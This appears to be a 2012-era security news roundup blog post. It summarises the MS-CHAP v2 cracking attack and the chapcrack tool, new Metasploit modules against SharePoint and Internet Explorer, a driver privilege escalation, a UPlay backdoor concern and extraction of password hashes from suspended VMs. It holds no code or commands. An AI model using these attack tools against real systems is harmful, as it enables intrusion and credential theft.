Security News #0x1A
- Moxie Marlinspike has a great discussion of the MS-CHAP v2 vulnerability he and David Hulton presented at DefCon. MS-CHAP v2 is an authentication protocol (RFC 2759; RFC 2433) developed by Microsoft that still sees significant use in PPTP VPNs and elsewhere. Due to some errors in the protocol, the effective strength of he algorithm is roughly equivalent to that of a single DES pass. They have developed the tool chapcrack that will locate all of the MS-CHAP v2 sessions and provide a token that can be submitted to CloudCracker which will return the corresponding key in under a day.
- A privilege escalation hole in the Nvidia Linux driver has been announced on the Full Disclosure mailing list.
- Instructions for how to install ModSecurity for IIS have now been posted to the ModSecurity Reference Manual.
- Jurriaan Bremer has developed a static analysis tool to detect when a program tries to access uninitialized memory.
- Here is a nice post from the Penetration Testing Lab blog for beginners on how to do some simple web application fingerprinting.
- And here is a nice post for budding reverse engineers by R4ndom showing how to patch and modify a binary.
- Dutch Ruppersberger posted to Twitter: "Looking for great college students to intern in my DC office this fall. Call the office at 202-225-3061 for further details. — Dutch Ruppersberger (@Call_Me_Dutch)".
- The next meeting of CharmSec is set for Thursday, August 30 at 7:00, in Fells Point in Baltimore.
- If you use Snort on (or near) Windows, you may be interested in Snort syntax highlighting in Notepad++.
- Metasploit has released a new module to attack Microsoft Office SharePoint Server 2007 resulting in arbitrary code execution as system. This attack exploits MS10-104, and had been tested on SharePoint Server 2007 running on Windows 2003 Server SP2.
- While I am thinking of Metasploit, they also released a new module to exploit Internet Explorer via CVE 2012-1876, which was also patched by MS12-037. The vulnerability here is in how Internet Explorer handles span attributes for col elements for a table. The module has been tested on IE 8 both on Windows 7 SP1 and on XP SP3 with ROP.
- There appear to be some problems with the UPLay system installed with Ubisoft games and it may allow some degree of back door access. See ZDNet’s take and the original post to Full Disclosure that started it all.
- Here is an advanced discussion of how to extract password hashes from suspended virtual machines.